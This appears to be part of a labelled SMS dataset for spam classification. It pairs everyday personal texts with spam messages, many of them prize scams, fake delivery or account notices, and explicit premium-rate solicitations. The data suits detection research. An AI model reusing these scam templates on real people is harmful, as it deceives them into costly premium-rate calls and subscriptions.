63 | Spam Congratulations ur awarded either a yrs supply of CDs from Virgin Records or a Mystery Gift GUARANTEED Call 09061104283 Ts&Cs www.smsco.net £1.50pm approx 3mins
64 | Spam U have a Secret Admirer who is looking 2 make contact with U-find out who they R*reveal who thinks UR so special-call on 09065171142-stopsms-08
65 | Ham Good day to You too.Pray for me.Remove the teeth as its painful maintaining other stuff.
66 | Spam Thanks 4 your continued support Your question this week will enter u in2 our draw 4 £100 cash. Name the NEW US President? txt ans to 80082
67 | Spam 4mths half price Orange line rental & latest camera phones 4 FREE. Had your phone 11mths+? Call MobilesDirect free on 08000938767 to update now! or2stoptxt T&Cs
68 | Ham No one interested. May be some business plan.
69 | Ham Ya ok, then had dinner?
70 | Spam URGENT! Your mobile number *************** WON a £2000 Bonus Caller prize on 10/06/03! This is the 2nd attempt to reach you! Call 09066368753 ASAP! Box 97N7QP, 150ppm
71 | Ham Neshanth..tel me who r u?
72 | Ham Convey my regards to him
73 | Ham Idk. You keep saying that you're not, but since he moved, we keep butting heads over freedom vs. responsibility. And i'm tired. I have so much other shit to deal with that i'm barely keeping myself to
74 | Ham Sir, i am waiting for your call, once free please call me.
75 | Spam ree entry in 2 a weekly comp for a chance to win an ipod. Txt POD to 80182 to get entry (std txt rate) T&C's apply 08452810073 for details 18+
76 | Spam Thanks for your subscription to Ringtone UK your mobile will be charged £5/month Please confirm by replying YES or NO. If you reply NO you will not be charged
77 | Ham Set a place for me in your heart and not in your mind, as the mind easily forgets but the heart will always remember. Wish you Happy Valentines Day!
78 | Ham In xam hall boy asked girl Tell me the starting term for dis answer I can den manage on my own After lot of hesitation n lookin around silently she said THE! intha ponnungale ipaditan;)
79 | Ham Hey you gave them your photo when you registered for driving ah? Tmr wanna meet at yck?
80 | Spam FREE entry into our £250 weekly comp just send the word WIN to 80086 NOW. 18 T&C www.txttowin.co.uk
81 | Ham 1) Go to write msg 2) Put on Dictionary mode 3)Cover the screen with hand, 4)Press <#> . 5)Gently remove Ur hand.. Its interesting..:)
82 | Spam Your 2004 account for 07XXXXXXXXX shows 786 unredeemed points. To claim call 08719181259 Identifier code: XXXXX Expires 26.03.05
83 | Spam You've won tkts to the EURO2004 CUP FINAL or £800 CASH, to collect CALL 09058099801 b4190604, POBOX 7876150ppm
84 | Ham Its not that time of the month nor mid of the time?
85 | Spam URGENT! Your Mobile number has been awarded with a £2000 prize GUARANTEED. Call 09061790126 from land line. Claim 3030. Valid 12hrs only 150ppm
86 | Spam Santa Calling! Would your little ones like a call from Santa Xmas eve? Call 09058094583 to book your time.
87 | Spam 3 FREE TAROT TEXTS! Find out about your love life now! TRY 3 FOR FREE! Text CHANCE to 85555 16 only! After 3 Free, Msgs £1.50 each
88 | Spam U were outbid by simonwatson5120 on the Shinco DVD Plyr. 2 bid again, visit sms. ac/smsrewards 2 end bid notifications, reply END OUT
89 | Spam URGENT! We are trying to contact U Todays draw shows that you have won a £800 prize GUARANTEED. Call 09050000460 from land line. Claim J89. po box245c2150pm
90 | Spam Get 3 Lions England tone, reply lionm 4 mono or lionp 4 poly. 4 more go 2 www.ringtones.co.uk, the original n best. Tones 3GBP network operator rates apply.
91 | Ham Now that you have started dont stop. Just pray for more good ideas and anything i see that can help you guys i.ll forward you a link.
92 | Spam Customer service announcement. We recently tried to make a delivery to you but were unable to do so, please call 07090298926 to re-schedule. Ref:9307622
93 | Ham Why are u up so early?
94 | Ham Exactly. Anyways how far. Is jide her to study or just visiting
95 | Ham No. I.ll meet you in the library
96 | Ham I don't run away frm u... I walk slowly & it kills me that u don't care enough to stop me...
97 | Spam You will be receiving this week's Triple Echo ringtone shortly. Enjoy it!
98 | Spam URGENT, IMPORTANT INFORMATION FOR O2 USER. TODAY IS YOUR LUCKY DAY! 2 FIND OUT WHY LOG ONTO HTTP://WWW.URAWINNER.COM THERE IS A FANTASTIC SURPRISE AWAITING FOR YOU
99 | Ham At 4. Let's go to bill millers
100 | Ham Solve d Case : A Man Was Found Murdered On <DECIMAL> . <#> AfterNoon. 1,His wife called Police. 2,Police questioned everyone. 3,Wife: Sir,I was sleeping, when the murder took place. 4.Co
101 | Ham Never try alone to take the weight of a tear that comes out of ur heart and falls through ur eyes... Always remember a STUPID FRIEND is here to share... BSLVYL
102 | Ham New car and house for my parents.:)i have only new job in hand:)
103 | Spam Your weekly Cool-Mob tones are ready to download !This weeks new Tones include: 1) Crazy Frog-AXEL F>>> 2) Akon-Lonely>>> 3) Black Eyed-Dont P >>>More info in n
104 | Ham If you ask her or she say any please message.
105 | Ham Sorry,in meeting I'll call later
106 | Ham I'll text carlos and let you know, hang on
107 | Ham I want to sent <#> mesages today. Thats y. Sorry if i hurts
108 | Ham Si.como no?!listened2the plaid album-quite gd&the new air1 which is hilarious-also boughtbraindancea comp.ofstuff on aphexs ;abel,u hav2hear it!c u sn xxxx
109 | Ham 5 nights...We nt staying at port step liao...Too ex
110 | Ham Can u get pic msgs to your phone?
111 | Spam Call 09095350301 and send our girls into erotic ecstacy. Just 60p/min. To stop texts call 08712460324 (nat rate)
112 | Ham K.k.how is your business now?
113 | Spam FreeMsg Today's the day if you are ready! I'm horny & live in your town. I love sex fun & games! Netcollex Ltd 08700621170150p per msg reply Stop to end
114 | Ham Have you heard from this week?
115 | Spam CLAIRE here am havin borin time & am now alone U wanna cum over 2nite? Chat now 09099725823 hope 2 C U Luv CLAIRE xx Calls£1/minmoremobsEMSPOBox45PO139WA
116 | Spam Romantic Paris. 2 nights, 2 flights from £79 Book now 4 next year. Call 08704439680Ts&Cs apply.
117 | Ham Talk to g and x about that
118 | Ham Go until jurong point, crazy.. Available only in bugis n great world la e buffet... Cine there got amore wat...
119 | Ham K then 2marrow are you coming to class.
120 | Spam Congrats! Nokia 3650 video camera phone is your Call 09066382422 Calls cost 150ppm Ave call 3mins vary from mobiles 16+ Close 300603 post BCM4284 Ldn WC1N3XX
121 | Spam Dear Voucher Holder, To claim this weeks offer, at your PC please go to http://www.wtlp.co.uk/text. Ts&Cs apply.
122 | Spam U can WIN £100 of Music Gift Vouchers every week starting NOW Txt the word DRAW to 87066 TsCs www.Idew.com SkillGame, 1Winaweek, age16. 150ppermessSubscription
123 | Spam Married local women looking for discreet action now! 5 real matches instantly to your phone. Text MATCH to 69969 Msg cost 150p 2 stop txt stop BCMSFWC1N3XX
124 | Spam Someone has conacted our dating service and entered your phone because they fancy you!To find out who it is call from landline 09111030116. PoBox12n146tf15
125 | Ham Shhhhh nobody is supposed to know!
126 | Ham I'm home. Doc gave me pain meds says everything is fine.
127 | Spam Hi, this is Mandy Sullivan calling from HOTMIX FM...you are chosen to receive £5000.00 in our Easter Prize draw.....Please telephone 09041940223 to claim before 29/03/05 or your prize will be transfer
128 | Ham how tall are you princess?
129 | Ham What time. I‘m out until prob 3 or so
130 | Spam Knock Knock Txt whose there to 80082 to enter r weekly draw 4 a £250 gift voucher 4 a store of yr choice. T&Cs www.tkls.com age16 to stoptxtstop£1.50/week
131 | Ham Love you aathi..love u lot..
132 | Spam sexy sexy cum and text me im wet and warm and ready for some porn! u up for some fun? THIS MSG IS FREE RECD MSGS 150P INC VAT 2 CANCEL TEXT STOP
133 | Spam You have an important customer service announcement. Call FREEPHONE 0800 542 0825 now!
134 | Spam Do you want a new Video handset? 750 any time any network mins? UNLIMITED TEXT? Camcorder? Reply or Call now 08000930705 for del Sat AM
135 | Ham Nothin comes to my mind. Ü help me buy hanger lor. Ur laptop not heavy?
136 | Ham Long beach lor. Expected... U having dinner now?
137 | Ham Talk With Yourself Atleast Once In A Day...!!! Otherwise You Will Miss Your Best FRIEND In This WORLD...!!! -Shakespeare- SHESIL <#>
138 | Ham A little. Meds say take once every 8 hours. It's only been 5 but pain is back. So I took another. Hope I don't die
139 | Ham Its like that hotel dusk game i think. You solve puzzles in a area thing
140 | Spam Want a new Video Phone? 750 anytime any network mins? Half price line rental free text for 3 months? Reply or call 08000930705 for free delivery
141 | Spam EASTENDERS TV Quiz. What FLOWER does DOT compare herself to? D= VIOLET E= TULIP F= LILY txt D E or F to 84025 NOW 4 chance 2 WIN £100 Cash WKENT/150P16+
142 | Ham Beerage?
143 | Ham V nice! Off 2 sheffield tom 2 air my opinions on categories 2 b used 2 measure ethnicity in next census. Busy transcribing. :-)
144 | Spam Sunshine Quiz Wkly Q! Win a top Sony DVD player if u know which country the Algarve is in? Txt ansr to 82277. £1.50 SP:Tyrone
145 | Spam From next month get upto 50% More Calls 4 Ur standard network charge 2 activate Call 9061100010 C Wire3.net 1st4Terms PoBox84 M26 3UZ Cost £1.50 min MobcudB more
146 | Ham Fuck babe ... I miss you already, you know ? Can't you let me send you some money towards your net ? I need you ... I want you ... I crave you ...
147 | Ham Mm you ask him to come its enough :-)
148 | Spam URGENT! Your Mobile number has been awarded with a £2000 prize GUARANTEED. Call 09061790121 from land line. Claim 3030. Valid 12hrs only 150ppm
149 | Ham Am in gobi arts college
150 | Spam Thank you, winner notified by sms. Good Luck! No future marketing reply STOP to 84122 customer services 08450542832
151 | Ham She's fine. Good to hear from you. How are you my dear? Happy new year oh.
152 | Spam URGENT! Your Mobile number has been awarded with a £2000 Bonus Caller Prize. Call 09058095201 from land line. Valid 12hrs only
153 | Spam Claim a 200 shopping spree, just call 08717895698 now! Have you won! MobStoreQuiz10ppm
154 | Spam U’ve Bin Awarded £50 to Play 4 Instant Cash. Call 08715203028 To Claim. EVERY 9th Player Wins Min £50-£500. OptOut 08718727870
155 | Spam Please CALL 08712402578 immediately as there is an urgent message waiting for you
156 | Spam +123 Congratulations - in this week's competition draw u have won the £1450 prize to claim just call 09050002311 b4280703. T&Cs/stop SMS 08718727868. Over 18 only 150ppm
157 | Ham It should take about <#> min
158 | Spam Sex up ur mobile with a FREE sexy pic of Jordan! Just text BABE to 88600. Then every wk get a sexy celeb! PocketBabe.co.uk 4 more pics. 16 £3/wk 087016248
159 | Spam January Male Sale! Hot Gay chat now cheaper, call 08709222922. National rate from 1.5p/min cheap to 7.8p/min peak! To stop texts call 08712460324 (10p/min)
160 | Spam Double Mins & Double Txt & 1/2 price Linerental on Latest Orange Bluetooth mobiles. Call MobileUpd8 for the very latest offers. 08000839402 or call2optout/LF56
161 | Ham Thanks love. But am i doing torch or bold.
162 | Ham We have all rounder:)so not required:)
163 | Ham What you did in leave.
164 | Ham Which is weird because I know I had it at one point
165 | Ham I sent you the prices and do you mean the <#> g,
166 | Spam SplashMobile: Choose from 1000s of gr8 tones each wk! This is a subscrition service with weekly tones costing 300p. U have one credit - kick back and ENJOY
167 | Ham Company is very good.environment is terrific and food is really nice:)
168 | Ham Arun can u transfr me d amt
169 | Ham Where to get those?
170 | Ham I dont thnk its a wrong calling between us
171 | Spam Dear Matthew please call 09063440451 from a landline, your complimentary 4*Lux Tenerife holiday or £1000 CASH await collection. ppm150 SAE T&Cs Box334 SK38XH.
172 | Spam Please call our customer service representative on 0800 169 6031 between 10am-9pm as you have WON a guaranteed £1000 cash or £5000 prize!
173 | Spam Cashbin.co.uk (Get lots of cash this weekend!) www.cashbin.co.uk Dear Welcome to the weekend We have got our biggest and best EVER cash give away!! These..
174 | Spam Sunshine Quiz! Win a super Sony DVD recorder if you canname the capital of Australia? Text MQUIZ to 82277. B
175 | Ham Mmmmmmm *snuggles into you* ...*deep contented sigh* ... *whispers* ... I fucking love you so much I can barely stand it ...
176 | Spam Wan2 win a Meet+Greet with Westlife 4 U or a m8? They are currently on what tour? 1)Unbreakable, 2)Untamed, 3)Unkempt. Text 1,2 or 3 to 83049. Cost 50p +std text
177 | Spam U can WIN £100 of Music Gift Vouchers every week starting NOW Txt the word DRAW to 87066 TsCs www.Idew.com SkillGame, 1Winaweek, age16. 150ppermessSubscription
178 | Ham We have sent JD for Customer Service cum Accounts Executive to ur mail id, For details contact us
179 | Spam tells u 2 call 09066358152 to claim £5000 prize. U have 2 enter all ur mobile & personal details @ the prompts. Careful!
180 | Spam U have a secret admirer who is looking 2 make contact with U-find out who they R*reveal who thinks UR so special-call on 09058094599
181 | Ham Am on the uworld site. Am i buying the qbank only or am i buying it with the self assessment also?
182 | Ham Okie
183 | Ham Dai <#> naal eruku.
184 | Spam FREE GAME. Get Rayman Golf 4 FREE from the O2 Games Arcade. 1st get UR games settings. Reply POST, then save & activ8. Press 0 key for Arcade. Termsapply
185 | Spam YOU HAVE WON! As a valued Vodafone customer our computer has picked YOU to win a £150 prize. To collect is easy. Just call 09061743386
186 | Ham You've already got a flaky parent. It'snot supposed to be the child's job to support the parent...not until they're The Ride age anyway. I'm supposed to be there to support you. And now i've hurt you.
187 | Ham Easy mate, * guess the quick drink was bit ambitious.
188 | Spam Save money on wedding lingerie at www.bridal.petticoatdreams.co.uk Choose from a superb selection with national delivery. Brought to you by WeddingFriend
189 | Ham U so lousy, run already come back then half dead... Hee...
190 | Ham Yup song bro. No creative. Neva test quality. He said check review online.
191 | Spam Do you want 750 anytime any network mins 150 text and a NEW VIDEO phone for only five pounds per week call 08002888812 or reply for delivery tomorrow
192 | Ham Petey boy whereare you me and all your friendsare in theKingshead come down if you canlove Nic
193 | Spam * FREE* POLYPHONIC RINGTONE Text SUPER to 87131 to get your FREE POLY TONE of the week now! 16 SN PoBox202 NR31 7ZS subscription 450pw
194 | Spam The current leading bid is 151. To pause this auction send OUT. Customer Care: 08718726270
195 | Spam Ever thought about living a good life with a perfect partner? Just txt back NAME and AGE to join the mobile community. (100p/SMS)
196 | Ham "Beautiful Truth against Gravity.. Read carefully: ""Our heart feels light when someone is in it.. But it feels very heavy when someone leaves it.."" GOODMORNING"
197 | Spam You will recieve your tone within the next 24hrs. For Terms and conditions please see Channel U Teletext Pg 750
198 | Spam Urgent Urgent! We have 800 FREE flights to Europe to give away, call B4 10th Sept & take a friend 4 FREE. Call now to claim on 09050000555. BA128NNFWFLY150ppm
199 | Spam December only! Had your mobile 11mths+? You are entitled to update to the latest colour camera mobile for Free! Call The Mobile Update VCo FREE on 08002986906
200 | Ham "Feb <#> is ""I LOVE U"" day. Send dis to all ur ""VALUED FRNDS"" evn me. If 3 comes back u'll gt married d person u luv! If u ignore dis u will lose ur luv 4 Evr"
201 | Ham Oh ho. Is this the first time u use these type of words
202 | Spam Ur balance is now £600. Next question: Complete the landmark, Big, A. Bob, B. Barry or C. Ben ?. Text A, B or C to 83738. Good luck!
203 | Ham I cant pick the phone right now. Pls send a message
204 | Spam Bored housewives! Chat n date now! 0871750.77.11! BT-national rate 10p/min only from landlines!
205 | Ham <#> in mca. But not conform.
206 | Ham The greatest test of courage on earth is to bear defeat without losing heart....gn tc
207 | Ham That means you got an A in epi, she.s fine. She.s here now.
208 | Ham K ill drink.pa then what doing. I need srs model pls send it to my mail id pa.
209 | Spam URGENT!! Your 4* Costa Del Sol Holiday or £5000 await collection. Call 09050090044 Now toClaim. SAE, TC s, POBox334, Stockport, SK38xh, Cost£1.50/pm, Max10mins
210 | Spam This is the 2nd time we have tried 2 contact u. U have won the 750 Pound prize. 2 claim is easy, call 08712101358 NOW! Only 10p per min. BT-national-rate
211 | Spam For taking part in our mobile survey yesterday! You can now have 500 texts 2 use however you wish. 2 get txts just send TXT to 80160 T&C www.txt43.com 1.50p
212 | Ham Sorry i'm not free...
213 | Spam Get your garden ready for summer with a FREE selection of summer bulbs and seeds worth £33:50 only with The Scotsman this Saturday. To stop go2 notxt.co.uk
214 | Spam You have 1 new message. Please call 08712400200.
215 | Spam RT-KIng Pro Video Club>> Need help? info@ringtoneking.co.uk or call 08701237397 You must be 16+ Club credits redeemable at www.ringtoneking.co.uk! Enjoy!
216 | Ham Jay wants to work out first, how's 4 sound?
217 | Spam FreeMsg: Txt: CALL to No: 86888 & claim your reward of 3 hours talk time to use from your phone now! Subscribe6GBP/mnth inc 3hrs 16 stop?txtStop
218 | Ham Oh ok..
219 | Spam PRIVATE! Your 2004 Account Statement for 078498****7 shows 786 unredeemed Bonus Points. To claim call 08719180219 Identifier Code: 45239 Expires 06.05.05
220 | Spam CDs 4u: Congratulations ur awarded £500 of CD gift vouchers or £125 gift guaranteed & Freeentry 2 £100 wkly draw xt MUSIC to 87066 TnCs www.ldew.com1win150ppmx3age16
221 | Ham Dude u knw also telugu..thts gud..k, gud nyt..
222 | Spam Double Mins & 1000 txts on Orange tariffs. Latest Motorola, SonyEricsson & Nokia with Bluetooth FREE! Call MobileUpd8 on 08000839402 or call2optout/HF8
223 | Spam FreeMsg Hey U, i just got 1 of these video/pic fones, reply WILD to this txt & ill send U my pics, hurry up Im so bored at work xxx (18 150p/rcvd STOP2stop)
224 | Spam Block Breaker now comes in deluxe format with new features and great graphics from T-Mobile. Buy for just £5 by replying GET BBDELUXE and take the challenge
225 | Ham Yar lor... How u noe? U used dat route too?
226 | Spam Latest News! Police station toilet stolen, cops have nothing to go on!
227 | Spam FREE NOKIA Or Motorola with upto 12mths 1/2price linerental, 500 FREE x-net mins&100txt/mth FREE B'tooth*. Call Mobileupd8 on 08001950382 or call 2optout/D3WV
228 | Spam Hi its LUCY Hubby at meetins all day Fri & I will B alone at hotel U fancy cumin over? Pls leave msg 2day 09099726395 Lucy x Calls£1/minMobsmoreLKPOBOX177HP51FL
229 | Spam Camera - You are awarded a SiPix Digital Camera! call 09061221066 fromm landline. Delivery within 28 days.
230 | Ham Sorry, I'll call later in meeting.
231 | Ham K...k:)why cant you come here and search job:)
232 | Spam FREE>Ringtone! Reply REAL or POLY eg REAL1 1. PushButton 2. DontCha 3. BabyGoodbye 4. GoldDigger 5. WeBeBurnin 1st tone FREE and 6 more when u join for £3/wk
233 | Spam Hungry gay guys feeling hungry and up 4 it, now. Call 08718730555 just 10p/min. To stop texts call 08712460324 (10p/min)
234 | Ham How are you, my Love ? Are you with your brother ? Time to talk english with him ? *grins* Say : Hey Muhommad, Penny says hello from across the sea
235 | Spam wamma get laid?want real doggin locations sent direct to your mobile? join the UKs largest dogging network. txt dogs to 69696 now!nyt. ec2a. 3lp £1.50/msg.
236 | Spam 500 New Mobiles from 2004, MUST GO! Txt: NOKIA to No: 89545 & collect yours today!From ONLY £1 www.4-tc.biz 2optout 087187262701.50gbp/mtmsg18
237 | Ham Shant disturb u anymore... Jia you...
238 | Spam Want 2 get laid tonight? Want real Dogging locations sent direct 2 ur mob? Join the UK's largest Dogging Network bt Txting GRAVEL to 69888! Nt. ec2a. 31p.msg@150p
239 | Spam Auction round 4. The highest bid is now £54. Next maximum bid is £71. To bid, send BIDS e. g. 10 (to bid £10) to 83383. Good luck.
240 | Spam XMAS Prize draws! We are trying to contact U. Todays draw shows that you have won a £2000 prize GUARANTEED. Call 09058094565 from land line. Valid 12hrs only
241 | Spam This message is brought to you by GMW Ltd. and is not connected to the
242 | Ham Hello! Good week? Fancy a drink or something later?
243 | Ham :)
244 | Ham Babe ! What are you doing ? Where are you ? Who are you talking to ? Do you think of me ? Are you being a good boy? Are you missing me? Do you love me ?
245 | Ham OH FUCK. JUSWOKE UP IN A BED ON A BOATIN THE DOCKS. SLEPT WID 25 YEAR OLD. SPINOUT! GIV U DA GOSSIP L8R. XXX
246 | Ham Sorry * was at the grocers.
247 | Ham How abt making some of the pics bigger?
248 | Ham Its ok..come to my home it vl nice to meet and v can chat..
249 | Ham aathi..where are you dear..
250 | Spam You have won a Nokia 7250i. This is what you get when you win our FREE auction. To take part send Nokia to 86021 now. HG/Suite342/2Lands Row/W1JHL 16+
251 | Ham It wont b until 2.15 as trying 2 sort house out, is that ok?
252 | Spam Thanks for the Vote. Now sing along with the stars with Karaoke on your mobile. For a FREE link just reply with SING now.
253 | Spam I am hot n horny and willing I live local to you - text a reply to hear strt back from me 150p per msg Netcollex LtdHelpDesk: 02085076972 reply Stop to end
254 | Spam I want some cock! My hubby's away, I need a real man 2 satisfy me. Txt WIFE to 89938 for no strings action. (Txt STOP 2 end, txt rec £1.50ea. OTBox 731 LA1 7WS. )
255 | Spam FREE for 1st week! No1 Nokia tone 4 ur mob every week just txt NOKIA to 8007 Get txting and tell ur mates www.getzed.co.uk POBox 36504 W45WQ norm150p/tone 16+
256 | Spam Summers finally here! Fancy a chat or flirt with sexy singles in yr area? To get MATCHED up just reply SUMMER now. Free 2 Join. OptOut txt STOP Help08714742804
257 | Ham How much it will cost approx . Per month.
258 | Spam todays vodafone numbers ending with 0089(my last four digits) are selected to received a £350 award. If your number matches please call 09063442151 to claim your £350 award
259 | Spam Please call our customer service representative on FREEPHONE 0808 145 4742 between 9am-11pm as you have WON a guaranteed £1000 cash or £5000 prize!
260 | Ham So many people seems to be special at first sight, But only very few will remain special to you till your last sight.. Maintain them till life ends.. Sh!jas
261 | Ham We stopped to get ice cream and will go back after
262 | Ham No da..today also i forgot..
263 | Ham Good morning princess! Have a great day!
264 | Spam Sunshine Quiz Wkly Q! Win a top Sony DVD player if u know which country Liverpool played in mid week? Txt ansr to 82277. £1.50 SP:Tyrone
265 | Spam Your account has been credited with 500 FREE Text Messages. To activate, just txt the word: CREDIT to No: 80488 T&Cs www.80488.biz
266 | Ham K..then come wenever u lik to come and also tel vikky to come by getting free time..:-)
267 | Ham Cant think of anyone with * spare room off * top of my head
268 | Ham There's no point hangin on to mr not right if he's not makin u happy
269 | Ham Yes..he is really great..bhaji told kallis best cricketer after sachin in world:).very tough to get out.
270 | Ham We don call like <#> times oh. No give us hypertension oh.
271 | Spam PRIVATE! Your 2003 Account Statement for 07973788240 shows 800 un-redeemed S. I. M. points. Call 08715203649 Identifier Code: 40533 Expires 31/10/04
272 | Ham Dear,Me at cherthala.in case u r coming cochin pls call bfore u start.i shall also reach accordingly.or tell me which day u r coming.tmorow i am engaged ans its holiday.
273 | Ham Yo, you gonna still be in stock tomorrow/today? I'm trying to get a dubsack
274 | Spam Last chance 2 claim ur £150 worth of discount vouchers-Text YES to 85023 now!SavaMob-member offers mobile T Cs 08717898035. £3.00 Sub. 16 . Remove txt X or STOP
275 | Spam URGENT! We are trying to contact U. Todays draw shows that you have won a £800 prize GUARANTEED. Call 09050001808 from land line. Claim M95. Valid12hrs only
276 | Spam PRIVATE! Your 2003 Account Statement for shows 800 un-redeemed S.I.M. points. Call 08718738001 Identifier Code: 49557 Expires 26/11/04
277 | Ham Havent.
278 | Spam Collect your VALENTINE'S weekend to PARIS inc Flight & Hotel + £200 Prize guaranteed! Text: PARIS to No: 69101. www.rtf.sphosting.com
279 | Ham Hope youre not having too much fun without me!! see u tomorrow love jess x
280 | Spam Final Chance! Claim ur £150 worth of discount vouchers today! Text YES to 85023 now! SavaMob, member offers mobile! T Cs SavaMob POBOX84, M263UZ. £3.00 Subs 16
281 | Ham My drive can only be read. I need to write
282 | Spam Dear U've been invited to XCHAT. This is our final attempt to contact u! Txt CHAT to 86688 150p/MsgrcvdHG/Suite342/2Lands/Row/W1J6HL LDN 18 yrs
283 | Ham Sorry, I'll call later
284 | Ham Nowadays people are notixiquating the laxinorficated opportunity for bambling of entropication.... Have you ever oblisingately opted ur books for the masteriastering amplikater of fidalfication? It is
285 | Ham Ok. No wahala. Just remember that a friend in need ...
286 | Spam UpgrdCentre Orange customer, you may now claim your FREE CAMERA PHONE upgrade for your loyalty. Call now on 0207 153 9153. Offer ends 26th July. T&C's apply. Opt-out available
287 | Ham Am slow in using biola's fne
288 | Ham Watching cartoon, listening music & at eve had to go temple & church.. What about u?
289 | Ham From here after The performance award is calculated every two month.not for current one month period..
290 | Spam Good Luck! Draw takes place 28th Feb 06. Good Luck! For removal send STOP to 87239 customer services 08708034412
291 | Spam Urgent! Please call 09061213237 from landline. £5000 cash or a luxury 4* Canary Islands Holiday await collection. T&Cs SAE PO Box 177. M227XY. 150ppm. 16+
292 | Spam URGENT!! Your 4* Costa Del Sol Holiday or £5000 await collection. Call 09050090044 Now toClaim. SAE, TC s, POBox334, Stockport, SK38xh, Cost£1.50/pm, Max10mins
293 | Spam Urgent UR awarded a complimentary trip to EuroDisinc Trav, Aco&Entry41 Or £1000. To claim txt DIS to 87121 18+6*£1.50(moreFrmMob. ShrAcomOrSglSuplt)10, LS1 3AJ
294 | Ham Wife.how she knew the time of murder exactly
295 | Ham Oooh bed ridden ey? What are YOU thinking of?
296 | Spam Back 2 work 2morro half term over! Can U C me 2nite 4 some sexy passion B4 I have 2 go back? Chat NOW 09099726481 Luv DENA Calls £1/minMobsmoreLKPOBOX177HP51FL
297 | Spam Ur ringtone service has changed! 25 Free credits! Go to club4mobiles.com to choose content now! Stop? txt CLUB STOP to 87070. 150p/wk Club4 PO Box1146 MK45 2WT
298 | Ham Today i'm not workin but not free oso... Gee... Thgt u workin at ur fren's shop ?
299 | Spam Win a £1000 cash prize or a prize worth £5000
300 | Spam PRIVATE! Your 2004 Account Statement for 07742676969 shows 786 unredeemed Bonus Points. To claim call 08719180248 Identifier Code: 45239 Expires
301 | Spam Wanna have a laugh? Try CHIT-CHAT on your mobile now! Logon by txting the word: CHAT and send it to No: 8883 CM PO Box 4217 London W1A 6ZF 16+ 118p/msg rcvd
302 | Spam Today's Offer! Claim ur £150 worth of discount vouchers! Text YES to 85023 now! SavaMob, member offers mobile! T Cs 08717898035. £3.00 Sub. 16 . Unsub reply X
303 | Ham Still work going on:)it is very small house.
304 | Spam money!!! you r a lucky winner ! 2 claim your prize text money 2 88600 over £1million to give away ! ppt150x3+normal text rate box403 w1t1jy
305 | Ham Some of them told accenture is not confirm. Is it true.
306 | Ham I am taking half day leave bec i am not well
307 | Spam 87077: Kick off a new season with 2wks FREE goals & news to ur mobile! Txt ur club name to 87077 eg VILLA to 87077
308 | Ham Good sleep is about rhythm. The person has to establish a rhythm that the body will learn and use. If you want to know more :-)
309 | Spam WELL DONE! Your 4* Costa Del Sol Holiday or £5000 await collection. Call 09050090044 Now toClaim. SAE, TCs, POBox334, Stockport, SK38xh, Cost£1.50/pm, Max10mins
310 | Ham Your opinion about me? 1. Over 2. Jada 3. Kusruthi 4. Lovable 5. Silent 6. Spl character 7. Not matured 8. Stylish 9. Simple Pls reply..
311 | Ham Nope thats fine. I might have a nap tho!
312 | Ham Ok u can take me shopping when u get paid =D
313 | Spam Money i have won wining number 946 wot do i do next
314 | Ham Mm feeling sleepy. today itself i shall get that dear
315 | Ham 7 lor... Change 2 suntec... Wat time u coming?
316 | Ham Beautiful tomorrow never comes.. When it comes, it's already TODAY.. In the hunt of beautiful tomorrow don't waste your wonderful TODAY.. GOODMORNING:)
317 | Spam We tried to contact you re your reply to our offer of a Video Handset? 750 anytime any networks mins? UNLIMITED TEXT? Camcorder? Reply or call 08000930705 NOW
318 | Spam U 447801259231 have a secret admirer who is looking 2 make contact with U-find out who they R*reveal who thinks UR so special-call on 09058094597
319 | Spam Hello darling how are you today? I would love to have a chat, why dont you tell me what you look like and what you are in to sexy?
320 | Ham Have you finished work yet? :)
321 | Ham I guess you could be as good an excuse as any, lol.
322 | Spam URGENT! Your Mobile number has been awarded with a £2000 prize GUARANTEED. Call 09058094455 from land line. Claim 3030. Valid 12hrs only
323 | Spam We tried to contact you re your reply to our offer of a Video Handset? 750 anytime networks mins? UNLIMITED TEXT? Camcorder? Reply or call 08000930705 NOW
324 | Ham Gokila is talking with you aha:)
325 | Spam You have WON a guaranteed £1000 cash or a £2000 prize. To claim yr prize call our customer service representative on 08714712379 between 10am-7pm Cost 10p
326 | Spam "Free Msg: get Gnarls Barkleys ""Crazy"" ringtone TOTALLY FREE just reply GO to this message right now!"
327 | Ham That's good. Lets thank God. Please complete the drug. Have lots of water. And have a beautiful day.
328 | Ham Just sent it. So what type of food do you like?
329 | Spam Talk sexy!! Make new friends or fall in love in the worlds most discreet text dating service. Just text VIP to 83110 and see who you could meet.
330 | Ham Having lunch:)you are not in online?why?
331 | Spam We currently have a message awaiting your collection. To collect your message just call 08718723815.
332 | Spam YOUR CHANCE TO BE ON A REALITY FANTASY SHOW call now = 08707509020 Just 20p per min NTT Ltd, PO Box 1327 Croydon CR9 5WB 0870 is a national = rate call.
333 | Ham Tired. I haven't slept well the past few nights.
334 | Ham Any chance you might have had with me evaporated as soon as you violated my privacy by stealing my phone number from your employer's paperwork. Not cool at all. Please do not contact me again or I wil
335 | Spam Burger King - Wanna play footy at a top stadium? Get 2 Burger King before 1st Sept and go Large or Super with Coca-Cola and walk out a winner
336 | Ham Oops. 4 got that bit.
337 | Ham No message..no responce..what happend?
338 | Ham Dont search love, let love find U. Thats why its called falling in love, bcoz U dont force yourself, U just fall and U know there is smeone to hold U... BSLVYL
339 | Spam Hi babe its Chloe, how r u? I was smashed on saturday night, it was great! How was your weekend? U been missing me? SP visionsms.com Text stop to stop 150p/text
340 | Spam Someone U know has asked our dating service 2 contact you! Cant Guess who? CALL 09058091854 NOW all will be revealed. PO BOX385 M6 6WU
341 | Spam "You have been specially selected to receive a ""3000 award! Call 08712402050 BEFORE the lines close. Cost 10ppm. 16+. T&Cs apply. AG Promo"
342 | Ham Good afternoon, my love! How goes that day ? I hope maybe you got some leads on a job. I think of you, boytoy and send you a passionate kiss from across the sea
343 | Ham If you don't respond imma assume you're still asleep and imma start calling n shit
344 | Spam WELL DONE! Your 4* Costa Del Sol Holiday or £5000 await collection. Call 09050090044 Now toClaim. SAE, TCs, POBox334, Stockport, SK38xh, Cost£1.50/pm, Max10mins
345 | Spam Someone U know has asked our dating service 2 contact you! Cant Guess who? CALL 09058097189 NOW all will be revealed. POBox 6, LS15HB 150p
346 | Spam How come it takes so little time for a child who is afraid of the dark to become a teenager who wants to stay out all night?
347 | Spam PRIVATE! Your 2003 Account Statement for shows 800 un-redeemed S. I. M. points. Call 08715203656 Identifier Code: 42049 Expires 26/10/04
348 | Spam SMS. ac JSco: Energy is high, but u may not know where 2channel it. 2day ur leadership skills r strong. Psychic? Reply ANS w/question. End? Reply END JSCO
